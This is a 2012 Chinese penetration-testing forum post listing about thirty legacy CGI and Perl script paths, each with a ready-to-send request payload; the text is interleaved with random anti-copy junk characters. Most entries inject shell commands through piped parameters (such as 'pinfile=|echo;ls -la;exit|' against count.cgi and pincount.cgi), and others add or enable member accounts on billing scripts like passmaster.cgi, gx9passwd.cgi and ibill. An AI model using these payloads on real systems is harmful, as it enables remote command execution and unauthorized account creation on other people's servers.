找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Cgi-bin 30个漏洞+使用方法
返回列表 发新帖
查看: 2890|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================/ U, l5 o1 p0 ~  N

* i' R# q- H& S% j" o/smspass.pl
9 \) |/ g- D/ B( w+ {username=username&password=password8 t+ W$ H; p  H0 J0 Q3 e9 k2 T/ K

. I5 ~: Q/ a  r& \* [/index.cgi
5 j4 R1 k; R0 M+ Iwei=ren&gen=command- q2 \1 r$ z6 h7 l- ^4 u
" Z: _# o' Z$ c; k) y; P; f0 Q# J
/passmaster.cgi) x6 O$ }3 W: W
Action=Add&Username=Username&Password=Password) n3 ]* s( a& ]# `0 C7 j" B7 ?
# u6 i* ]0 u$ h' X( `7 m
/accountcreate.cgi# R+ P  g. j' C  i1 u
username=username&password=password&ref1=|echo;ls|' R+ l1 ~6 Y" B' D; u- r& c
8 q" h2 w4 W0 Z' S( n
/form.cgi# }: l0 j4 ?1 e0 k9 }1 W$ j
name=xxxx&email=email&subject=xxxx&response=|echo;ls|& a8 h+ F, f9 C
$ b6 r- W" `! t4 u' [4 y1 x
/addusr.pl& q0 }9 A5 w5 l" `- u4 _8 B6 @
/cgi-bin/EuroDebit/addusr.pl, f0 W- Q$ J9 X) o( E
user=username&pass=Password&confirm=Password
5 O- n3 T3 B% e! v- C8 I& Q" z2 U% u4 f0 P/ U5 ^) ]
/ccbill-local.asp# w6 P- X, j5 `; w
post_values=username:password
: ~2 F  x  a4 ?( C- V( x
* U" y  C/ p& O/ ]) O3 o) I! A/count.cgi# g% x, ^( |7 q4 y
pinfile=|echo;ls -la;exit|5 M/ i8 q7 Y- ?2 A+ H( E' O
6 V; X/ y' @( Z9 G! H! ]
/recon.cgi# N8 u) I+ i* L4 J( x( a
/recon.cgi?search
3 h7 M6 B# t4 s, o5 f; msearchoption=1&searchfor=|echo;ls -al;exit|/ g2 K. l4 F' L0 v# F
8 e, M- H9 ^* X) D$ f# f, N, \
/verotelrum.pl
) V* @% |7 B3 G2 Y3 J' uvercode=username:password:dseegsow:add:amount<&30>
4 q0 {9 @# G7 [! ~" d' p# W
. E1 B, Q( `, ?, P6 ~% H6 w/af.cgi7 `! Z! a5 a% w  H; b
_browser_out=|echo;ls -la;exit;|1 `; b. N  J' F. O5 ^# e
, ~9 Q- d5 J' ]5 E
/modify.cgi& b% _4 _5 p. ]" q8 P
username=username&password=password&expire=30
: p( R0 N1 }" u+ K: T7 k* e
2 u. }( H( o  t& `4 h* T. q/openjournal.cgi
4 ~& g6 s8 n/ Z- ]edit=1&ct=2&go=|echo;ls -al;exit|6 f. ]6 @# e3 l& B  R" j

. ~8 Z; Z- {6 t9 i" p/gx9passwd.cgi2 b6 i" d( r* W4 c7 [3 j
cmd=ADD&user=username&pass=password
  r! I2 z  `0 i: d+ o3 L
$ E. Z7 D$ u- B/probecontrol.cgi
6 A4 A, C- _' B% ycommand=enable&username=username&password=password
, q2 h, {7 q4 j) p, `0 \( G0 ]" Y0 s  K8 @3 \# [; Y: i
/recon.cgi
# \' j' r6 T+ P5 C( n, Nsearchoption=3&searchfor=echo;ls -la;exit
' b7 t  v: y: [0 L6 A- n5 J" K" o' S1 X  p
/htadd.pl
3 A9 w7 q9 C: L8 a/ |configfile=|echo; ls -alt; exit0 _  r' p0 s2 x9 _9 |- D) k
9 o/ p& v  f% W+ P0 D. h
/gx9passwd.cgi$ u. C' K# S1 x5 l% ]' E) Q
cmd=ADD&user=username&pass=password4 w: m, n$ j3 H4 d

& P8 q# x, w9 f7 D/ibill*.pl; @6 g, k# G, M5 c' G
reqtype=add&authpwd=authpwd&username=username&password=password* H, x7 y+ P! X; k" [- k+ Y9 S

5 J. N  w5 A0 Q0 g/cpay.cgi
& T) q$ B5 C1 T) T9 p5 d- P$ l$ kcommand=add_member&username=username(EMAIL)&password=password(DES)0 n' C( z+ e: `- T7 T; p, ^* A6 @
  T! G( Y1 F( J' B) o+ {
/globill_ut.cgi
  Z0 C: X# {6 S  r8 ndo=add&username=username&password=password&wpassword=password0 K& ~" z% e- \9 c2 M

6 B9 I- l2 `3 g$ @$ T/usercontrol.cgi4 x3 L( D  o- p# `
command=enable&username=USER&password=PASS2 a" b0 W8 [4 E8 U
; ]2 v* [# h; W2 H, m
/globoSALErum.cgi0 X8 I4 V0 F- v
action=ADD&seccode=seccode&login=username&password=password
: K2 I- S0 m" d. E: {0 M( n' o1 ?. {5 l5 _) T. ^6 m+ h+ J
/addusr.pl6 y* T( s; k( @, Z: J/ c8 s: N
user=USER&pass=PASS&confirm=PASS9 n" {# z. M+ u1 M

- }) t' V3 X; K: v/pincount.cgi0 T1 V1 E" w( J; C; S/ I+ X9 a
/cgi-bin/mastergate/pincount.cgi: h8 W. d1 p6 M3 `/ i
pinfile=|echo;pwd;exit|1 D5 q+ a9 S: o$ t) E! G

( i- I9 H8 v, u1 v6 s1 e7 E" x9 ], N/accountcreate.cgi
3 U6 G& d* h4 Q# l2 a* F/cgi-bin/gateway/accountcreate.cgi
6 C) K: J& I3 S3 ausername=username&password=password&password2=password&ref1=|echo;ls -al;exit
" C3 p. [* S# ?- k& U  h. P2 r
9 r! o1 Q- D1 J3 x/af.cgi
7 ?1 T- A8 u4 @' F5 T; t  G! s/env.cgi
$ g) @- s0 {, N) h; T% JADD+;echo;pwd;exit
/ q/ L, s. ]8 [; K5 B: d, i1 e4 N% Z+ \: j* Y
/count.cgi
  i: h, z) {0 \) j3 k: J; Wpinfile=|echo;pwd;exit|- g/ r$ B, `( U# ]* [2 a
* V' X! }3 y* w' D2 v
/recon.cgi
! W5 w& _: g  B! H) |, zsearchoption=1&searchfor=|echo;ls%20-al;exit|% U) c( d! a: \$ ~
& g6 Y5 I9 W" ^6 R, o  p/ E
/add.cgi* \/ d1 A/ S! S: ^
username=username&password=password&expire=301 C6 m8 S# b5 Y1 o

! ~! }* m! y- G8 k==============================
/ `7 s% l; l& T4 ~7 w
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表